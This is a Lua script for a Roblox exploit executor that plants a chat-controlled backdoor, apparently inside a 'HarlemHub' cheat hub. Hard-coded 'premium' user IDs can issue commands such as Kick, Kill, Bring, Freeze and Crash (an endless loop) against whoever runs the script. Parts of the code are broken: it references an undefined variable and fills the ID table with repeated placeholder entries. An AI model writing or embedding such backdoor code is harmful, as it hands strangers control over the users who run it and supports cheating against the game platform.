local AdminPrefix = "$" 
local Players = game:GetService("Players")
local LocalP = Players.LocalPlayer;
getgenv().AdminTable = {
	[2979792468] = {["Access"] = 5}; --Harlem
	[2864614126] = {["Access"] = 5}; --Harlem
	[2353695908] = {["Access"] = 5}; --Harlem
	[57] = {["Access"] = 5}; -- 
	[567] = {["Access"] = 5}; -- 
	[5675] = {["Access"] = 5}; -- 
	[567] = {["Access"] = 5}; -- 
	[567] = {["Access"] = 5}; -- 
	[567] = {["Access"] = 5}; -- 
	[567] = {["Access"] = 5}; -- 
	[567] = {["Access"] = 5}; -- 
	[576] = {["Access"] = 5}; --
	[657] = {["Access"] = 5}; -- 
	[567] = {["Access"] = 5}; -- 
	[756] = {["Access"] = 5}; -- 
	[567] = {["Access"] = 5}; -- 
	[57] = {["Access"] = 5}; -- 
	[56] = {["Access"] = 5}; -- 
	[678] = {["Access"] = 5}; -- 
	[768] = {["Access"] = 5}; -- 
	[678] = {["Access"] = 5}; -- 
	[678] = {["Access"] = 5}; -- 
	[678] = {["Access"] = 5}; -- 
	[768] = {["Access"] = 5}; -- 
	[68] = {["Access"] = 5}; -- 
	[678] = {["Access"] = 5}; -- 
	[768] = {["Access"] = 5}; -- 
	[67] = {["Access"] = 5}; -- 
	[64] = {["Access"] = 5}; -- 
	[657] = {["Access"] = 5}; -- 
	[879] = {["Access"] = 5}; -- 
	[58] = {["Access"] = 5}; -- 
	[68] = {["Access"] = 5}; -- 
	[886] = {["Access"] = 5}; -- 
	[47] = {["Access"] = 5}; -- 
	[567] = {["Access"] = 5} -- 
}

local GP = Players:GetPlayers()
for i = 1, #GP do
	local CoolKidPlayer = GP[i]
	CoolKidPlayer.Chatted:Connect(function(Word)
		BDCheck(CoolKidPlayer, Word)
	end)
end
Players.PlayerAdded:Connect(function(CKP)
	CKP.Chatted:Connect(function(Message)
		BDCheck(CKP, Message)
	end)
end)

getgenv().psearch = function(Name)
	local Inserted = {}
	for _, p in pairs(Players:GetPlayers()) do
		if string.lower(string.sub(p.Name,1, string.len(Name))) == string.lower(Name) then
			table.insert(Inserted, p);return p
		end
	end
end 

getgenv().AdminCmdList = {
	["Kick"] = {
		["CommandFunc"] = function(Player, self, CmdPlayer)
			if Player == LocalP or Player == "all" then
				LocalP:Kick("You have been kicked by a HarlemHub premium member.", self)
			end
		end;
		["Clearence"] = {[5] = true;};
	}; 
	["Kill"] = {
		["CommandFunc"] = function(Player, self, CmdPlayer)
			if Player == LocalP or Player == "all" then
				LocalP.Character:FindFirstChildOfClass("Humanoid"):ChangeState(15)
			end
		end;
		["Clearence"] = {[4] = true;[5] = true;};
	};
	["Bring"] = {
		["CommandFunc"] = function(Player, self, CmdPlayer)
			if Player == LocalP or Player == "all" then
				LocalP.Character.HumanoidRootPart.CFrame = game:GetService("Players")[CmdPlayer.Name].Character.HumanoidRootPart.CFrame
			end
		end;
		["Clearence"] = {[4] = true;[5] = true;};
	};
	["Freeze"] = {
		["CommandFunc"] = function(Player, self, CmdPlayer)
			if Player == LocalP or Player == "all" then
				for i, x in next, char:GetDescendants() do
					if x:IsA("BasePart") and not x.Anchored then
						x.Anchored = true
					end
				end
			end
		end;
		["Clearence"] = {[4] = true;[5] = true;};
	};
	["Unfreeze"] = {
		["CommandFunc"] = function(Player, self, CmdPlayer)
			if Player == LocalP or Player == "all" then
				for i, x in next, char:GetDescendants() do
					if x:IsA("BasePart") and x.Anchored then
						x.Anchored = false
					end
				end
			end
		end;
		["Clearence"] = {[4] = true;[5] = true;};
	};
	["Walkspeed"] = {
		["CommandFunc"] = function(Player, self, CmdPlayer)
			if Player == LocalP or Player == "all" then
				LocalP.Character:FindFirstChildOfClass("Humanoid").WalkSpeed = 30
			end
		end;
		["Clearence"] = {[4] = true;[5] = true;};
	};
	["Crash"] = {
		["CommandFunc"] = function(Player, self, CmdPlayer)
			if Player == LocalP or Player == "all" then
while true do
				end
			end
		end;
		["Clearence"] = {[4] = true;[5] = true;};
	};
	["Jumppower"] = {
		["CommandFunc"] = function(Player, self, CmdPlayer)
			if Player == LocalP or Player == "all" then
				LocalP.Character:FindFirstChildOfClass("Humanoid").JumpPower = 50
			end
		end;
		["Clearence"] = {[4] = true;[5] = true;};
	};
};

getgenv().BDCheck = function(Target2, Chat)
	if Chat:sub(1, 1) == AdminPrefix then
		local args = string.split(Chat:sub(2), " ")
		local Command = AdminCmdList[table.remove(args, 1)]
		local targ1 = psearch(table.remove(args, 1))
		if Command and targ1 then 
			return Command and Command["Clearence"][AdminTable[Target2.UserId].Access] and Command["CommandFunc"](targ1, table.concat(args, " "), Target2)
		end
	end
end
